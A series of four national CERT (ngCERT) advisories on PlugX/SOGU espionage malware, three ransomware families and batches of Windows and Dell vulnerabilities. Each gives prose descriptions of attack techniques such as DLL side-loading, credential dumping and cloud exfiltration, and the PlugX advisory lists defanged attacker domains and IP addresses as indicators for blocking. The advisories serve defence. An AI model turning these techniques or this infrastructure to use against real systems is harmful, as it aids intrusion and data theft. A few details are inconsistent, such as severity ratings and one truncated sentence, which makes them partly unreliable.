Advisory ID:   ngCERT-2025-100004

SUMMARY

ngCERT’s attention has been drawn to the resurgence of SOGU, aka PlugX malware infiltration, which poses a significant threat to Nigeria’s cyberspace. The malware is a sophisticated modular Remote Access Trojan (RAT) deployed by Advanced Persistent Threat (APT) actors in cyber-espionage campaigns. These attacks target critical infrastructure across multiple sectors, including telecommunication companies, as observed in current reports. SOGU is also identified as a backdoor with keylogging, surveillance, data exfiltration and stealth capabilities, while disguising itself as legitimate applications to avoid detection. New variants are equally capable of remote code execution, ensuring persistence through Dynamic Link Libraries (DLL) side-loading while implementing new C2 command identifiers. The compromise of critical infrastructure by this malware could result in privacy and data breaches, supply chain risks, financial losses, as well as reputational damage and possibly geopolitical implications. This underscores the need for public and private sector organisations to emplace robust defences to safeguard and mitigate the threats posed by PlugX.

Damage:      Critical

Probability:  High 

Platform(s):  Operating System, Networks and IoTs

DESCRIPTION

The recent PlugX attacks have targeted critical infrastructure, particularly telecommunications networks, by leveraging DLL side-loading for espionage purposes. In the initial access stage, attackers exploit legitimate executables, such as those from Quick Heal's Mobile Popup Application, to initiate DLL search order hijacking or side-loading of a malicious DLL. Notably, new variants also gain initial access by exploiting vulnerabilities in edge devices, such as firewalls and VPNs, and possibly weaknesses in IoTs. To deploy and execute the payload, the malicious DLL decrypts and loads PlugX (alongside variants like RainyDay or Turian) directly into memory using. This is achieved by utilizing Rivest Cypher 4 (a symmetric stream cypher) encryption and shared algorithms to evade disk-based detection. Likewise, the malware employs techniques like control flow flattening, API hashing, and embedded keyloggers to obscure its operations and resist reverse engineering. To ensure persistence and command execution, PlugX establishes long-term access, enabling arbitrary command execution, file uploads/downloads, and keylogging for credential theft and lateral movement within the network. Furthermore, compromised systems facilitate the theft of sensitive data, such as communications metadata, supporting broader cyber-espionage goals against critical sectors.

INDICATORS OF COMPROMISE

The following are observed Indicators of Compromise IoCs:

1. Domains

   a)   [.]relivonline[.]com

   b)   [.]im0[.]site

   c)   [.]frillsforspills[.]com

  d)   [.]365safemail[.]com

2. IPs with Ports

           a) 103[.]79[.]120[.]85:443

           b)  103[.]79[.]120[.]92:443

c)  103[.]79[.]120[.]71:443

d)  103[.]79[.]120[.]71:5000

e)  103[.]107[.]104[.]61:443

f)  103[.]107[.]104[.]61:5000

g)  39[.]105[.]24[.]38:3478

h)  39[.]105[.]24[.]38:443

i)    121[.]201[.]74[.]246:5000

j)   69[.]172[.]75[.]148:5000

k)  154[.]90[.]47[.]123:443

l)   154[.]90[.]47[.]123:5000

m) 45[.]128[.]153[.]73:443

CONSEQUENCES

SOGU aka PlugX malware attacks could result in:

1. Extensive data exfiltration and espionage.
2. Compromise of networks in critical sectors like telecom that can act as vectors for supply chain attacks.
3. Economic and financial losses.
4. Breaches that could further result in reputational damage, customer trust erosion, regulatory fines, and legal scrutiny.
5. Operational disruptions and Denial of Service (DoS) attacks.

SOLUTION/MITIGATION

ngCERT recommends that organisations:

1. Conduct regular security awareness training to help users recognize phishing attempts.
2. Implement advanced email filtering solutions to block malicious emails before reaching end-users.
3. Deploy and maintain up-to-date antivirus solutions capable of detecting PlugX signatures and behaviors.
4. Enforce 2FA to protect access to sensitive systems and applications.
5. Conduct regular analysis of system and network logs to identify anomalies related to PlugX behavior.
6. Ensure the prompt application of patches and updates to all software to minimize exploitation
7. opportunities.
8. Filter network traffic by preventing unknown or untrusted access to remote services on internal systems.
9. Ensure the review of domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.

HYPERLINK

• https://cybersecsentinel.com/the-return-of-plugx-malware-with-fresh-tricks/
• https://thehackernews.com/2025/09/china-linked-plugx-and-bookworm-malware.html
• https://security.googlecloudcommunity.com/community-blog-42/finding-malware-detecting-sogu-with-google-security-operations-3869
• https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx

Advisory ID:   ngCERT-2025-100003

SUMMARY

ngCERT is aware of LockGoga, MegaCortex, and Nefilim, sophisticated and hybrid ransomware variants which have been active from 2019-2021, and linked to a threat actor identified as deadforz with aliases “Boba,” “msfv,” and “farnetwork. These ransomware strains have targeted critical infrastructure, manufacturing, healthcare, and transportation sectors in several countries across the globe, resulting in the loss of millions of US dollars. This underscores the need for Organizations to review their systems for indicators of compromise (IoCs) and strengthen defences against potential affiliate-driven attacks.

Damage:      Critical

Probability:  High 

Platform(s):  Microsoft Windows, Dell Firmware

DESCRIPTION

Notably, LockGoga targets industrial systems by utilizing Advanced Encryption Standard (AES) encryption, and appends ".locked" to files. Initial access is achieved through phishing or stolen Remote Desktop Protocol (RDP) credentials. Thereafter, the malware is dropped in the %TEMP% folder, which disables networks, clears disk space with cipher.exe, encrypts files and demands email-based payment. Also, MegaCortex is a hybrid ransomware used to target enterprises and possesses anti-analysis capabilities. Its attack chain involves initial access through phishing, SQL injection, or RDP exploits. Next, it uses Cobalt Strike for persistence, runs kill.bat to evade antivirus detection, propagates via Qakbot, and demands multi-million-dollar ransoms. Furthermore, Nefilim uses double extortion with AES-128 or Rivest–Shamir–Adleman (RSA-2048) cryptosystem (a family of public-key cryptosystems used for secure data transmission). It also appends ".NEFILIM" or ".DERZKO" to files, while exploiting CVE-2019-19781 (a critical vulnerability in Citrix Application Delivery Controller (ADC) and Gateway products, allowing unauthenticated attackers to execute arbitrary code remotely via a directory traversal flaw). Threat actors also exploit RDP or phishing for initial access. Further, Mimikatz and PsExec/WMI are employed for credential dumping, lateral movement within networks, privilege escalation, and persistence before exfiltrating data to clouds like MEGAsync. Thereafter, the criminals threaten to leak sensitive information.

INDICATORS OF COMPROMISE

The following are observed Indicators of Compromise IoCs:

1. LockGoga: SHA256 hashes in Fortinet/Unit42 reports; %TEMP% execution, cipher.exe use, ".locked" extensions; email-based ransom demands.

2. MegaCortex: Hashes in Heimdal reports; kill.bat, Cobalt Strike beacons, RDP port 3389 activity; Qakbot-related traffic.

3. Nefilim: Delphi-based samples; Mimikatz dumps, PsExec/WMI usage, MEGAsync exfiltration; connections to known exfil domains; Citrix exploit attempts.

CONSEQUENCES

Successful attacks by LockGoga, MegaCortex, and Nefilim ransomware variants could result in:

1. Disruption of operations, supply chain interruptions and possible Denial of Service (DoS) attacks.
2. Financial losses due to ransom payments, recovery costs and General Data Protection Regulation (GDPR) fines.
3. Reputational damage due to data exposure from possible dark web leaks and the possibility of secondary extortion.
4. National security risks occasioned by breaches to defence and sensitive critical infrastructure.

SOLUTION/MITIGATION

ngCERT recommends that organisations:

1. Patch vulnerabilities such as CVE-2019-19781 and RDP, enforce Multifactor authentication, implement Zero Trust and least-privilege access to initial access.
2. Deploy Endpoint Detection and Response (EDR) for behavioural monitoring such as process injection, lateral movement, credential dumping and cloud exfiltration.
3. Maintain offline, immutable backups (3-2-1 rule); test recovery quarterly; avoid ransom payments and report to ngCERT in the event of an attack, to ensure speedy recovery.
4. Block IoCs at firewalls.
5. Conduct regular phishing awareness training for all staff.

HYPERLINK

• https://www.fortinet.com/blog/threat-research/lockergoga-ransomeware-targeting-critical-infrastructure
• https://heimdalsecurity.com/blog/megacortex-ransomware/
• https://www.sisainfosec.com/blogs/nefilim-ransomware/
• https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks

Advisory ID:   ngCERT-2025-100002

SUMMARY

ngCERT has detected about 78 (medium to low) vulnerabilities primarily impacting Microsoft Windows components like Windows Digital Media and Secure Boot, as well as Dell firmware. These weaknesses include elevation of privilege (EoP), security feature bypasses, and improper access controls, with CVSS v3.1 scores from 4.3 to 8.1 (low to high severity). Most of these require local access, but exploitation could lead to system compromise or data exposure. Although the vulnerabilities have been patched, there is an urgent need for these systems to be updated and the patches applied to safeguard against exploits and possible cyberattacks.

Damage:      Critical

Probability:  High 

Platform(s):  Microsoft Windows, Dell Firmware

DESCRIPTION

The vulnerabilities mainly affect Microsoft Windows 10/11 and Server 2019/2022, with some impacting Dell firmware and older non-Microsoft products. Key details include:

a) Windows Digital Media (EoP):Over 40 CVEs, such as (CVE-2025-21229 and CVE-2025-21255), involve improper input validation or out-of-bounds reads, allowing local attackers to gain SYSTEM-level privileges.

b)  Windows Secure Boot:CVE-2025-21211 allows bypassing Secure Boot via flaws in DBX update validation, enabling unsigned bootloader execution.

c)  Dell Firmware: CVE-2024-52537 permits high-privileged attackers to exploit symlink issues in the Dell Client Platform Firmware Update Utility for privilege escalation.

d) Other Microsoft Issues:CVEs like CVE-2024-55541 (audio driver buffer overflow) and CVE-2024-51456 (SMB Remote Code Execution) cover Denial-of-Service (DoS), kernel exploits, and remote code execution.

e)  Legacy/Other Vendors: Older CVEs such as CVE-2023-50946 in OpenSSH, CVE-2021-29669 in Zyxel) involve RCE, EoP, or information disclosure in non-Microsoft products.

CONSEQUENCES

Successful exploitation of these flaws could result in:

1. Privilege Escalation: Local attackers could gain SYSTEM access, enabling malware persistence, data theft, or network lateral movement.
2. System Integrity Loss: Secure Boot bypass (CVE-2025-21211) allows rootkits or tampered firmware to evade boot protections.
3. Service Disruption: Denial of Service (DoS) issues, such as (CVE-2024-55541), may crash services or leak kernel memory.
4. Chained Attacks: These flaws could enable ransomware or APTs. No active exploits are reported as of October 2025, but local access increases insider threat risks.

SOLUTION/MITIGATION

To mitigate these vulnerabilities, ngCERT recommends the following measures:

1. Apply Patches: Install Microsoft January 2025 updates via Windows Update or WSUS. For CVE-2024-52537, update Dell firmware using Dell Command Update.
2. Enhance Access Controls: Enforce least privilege, disable untrusted media playback, and use AppLocker/WDAC to block unsigned binaries.
3. Monitor and Harden: Enable Secure Boot and TPM 2.0; use EDR tools to detect privilege escalation. Apply upstream patches for legacy CVEs such as OpenSSH.
4. Verify Systems: Scan for vulnerable versions with tools like Qualys or Tenable. Check Microsoft Security Response Centre for updates.
5. Best Practices: Segment networks, adopt zero-trust, and test patches in staging environments. Isolate or retire end-of-support systems.

HYPERLINK

• https://msrc.microsoft.com/update-guide
• https://www.tenable.com/blog/microsofts-september-2025-patch-tuesday-addresses-80-cves-cve-2025-55234
• https://www.rapid7.com/blog/post/em-patch-tuesday-september-2025/
• https://isc.sans.edu/diary/31590

Advisory ID:   ngCERT-2025-100001

SUMMARY

ngCERT has detected over 100 (Critical and high) vulnerabilities primarily affecting Microsoft Windows components like Office and a few third-party issues. Key risks include remote code execution (RCE), elevation of privilege (EoP), and zero-day exploits, with high CVSS scores (up to 9.8). Ten critical flaws and eight zero-days were noted, some actively exploited and listed in the US Cybersecurity and Infrastructure Security Agency's catalogue. It is pertinent to note that these vulnerabilities have been patched by Microsoft, hence the urgent need for system updates and the application of available patches.

Damage:      Critical

Probability:  High 

Platform(s):  Microsoft Windows

DESCRIPTION

The vulnerabilities principally affect Microsoft systems categorized as follows:

a)  RCE in Core Windows Components (About 36% of Microsoft CVEs): Flaws enabling arbitrary code execution via emails, packets, or files with low interaction. Examples include Windows OLE (e.g., CVE-2025-21298 for zero-click Outlook previews), Telephony Service (over 20 CVEs like CVE-2025-21286, CVE-2025-21266, all CVSS 8.8), Remote Desktop Services (e.g., CVE-2025-21297), and others like BranchCache and SPNEGO authentication.

b)   EoP in Virtualization and Installers (About 25% of Microsoft CVEs): Allows attackers to escalate to SYSTEM privileges. Notable are Hyper-V flaws, including CVE-2025-21333, exploited zero-days with CVSS 7.8, and App Installer issues such as CVE-2025-21275. Also includes NTLMv1 remote exploitation.

c)   Office and Developer Tools Issues:RCE/EoP in Access, Excel, Outlook, .NET, and Visual Studio, including CVE-2025-21186, zero-days with CVSS 7.8, often via malicious documents.

d)      DoS and Information Disclosure:Impacts services like MSMQ (e.g., CVE-2025-21251) and kernel memory leaks.

e)   Third-Party and Older CVEs:Includes authentication bypass in Progress WhatsUp Gold, such as CVE-2024-12108, CVSS 9.6 and legacy issues like Kerberos (2022 CVEs).

CONSEQUENCES

Successful exploitation of these flaws could result in:

1. Full System Compromise: RCE flaws allow attackers to run arbitrary code as the user or SYSTEM, enabling malware deployment, ransomware, or persistent access.
2. Privilege Escalation and Lateral Movement: EoP in Hyper-V or installers facilitates VM escapes, domain dominance, or supply-chain attacks in enterprise networks.
3. Data Theft/Exfiltration: Information disclosures (e.g., NTLM hashes via CVE-2025-21308) enable pass-the-hash attacks; Office flaws risk sensitive document leaks.
4. Service Disruption: DoS in MSMQ or RDP could halt critical operations in monitored environments.
5. Broader Impact: Zero-days like CVE-2025-21298 are wormable via email, amplifying spread in unpatched fleets. For third parties such as WhatsUp Gold, unauthorized server access risks network-wide reconnaissance. Unmitigated, these could lead to regulatory non-compliance issues with GDPR and NIST, and financial losses from breaches.

SOLUTION/MITIGATION

To mitigate these vulnerabilities, ngCERT recommends the following measures:

1. Patch Urgently: Apply January 2025 updates such as KB5040431 through Windows Update or management tools; prioritize exposed systems and test first.
2. Hardening Measures: Disable NTLMv1, block unnecessary ports such as PGM UDP, restrict email previews in Outlook, enable Credential Guard for Hyper-V, and use EPA for authentication. For third-party tools like WhatsUp Gold, upgrade to patched versions and rotate keys.
3. Detection Strategies: Deploy EDR for anomaly monitoring (e.g., Telephony or OLE activity), enable logging for RDP/MSMQ, and scan for PoCs.
4. General Practices: Ensure network segmentation, least privilege, regular scans, and MSRC subscriptions to reduce exposure.

HYPERLINK

• https://jetpatch.com/blog/patch-tuesday/microsoft-january-2025-patch-tuesday/
• https://www.tenable.com/blog/microsofts-january-2025-patch-tuesday-157-cves-cve-2025-21333-cve-2025-21334-cve-2025-21335
• https://www.tenable.com/blog/microsofts-august-2025-patch-tuesday-addresses-107-cves-cve-2025-53779
• https://support.microsoft.com/en-us/topic/protections-for-cve-2025-26647-kerberos-authentication-5f5d753b-4023-4dd3-b7b7-c8b104933d53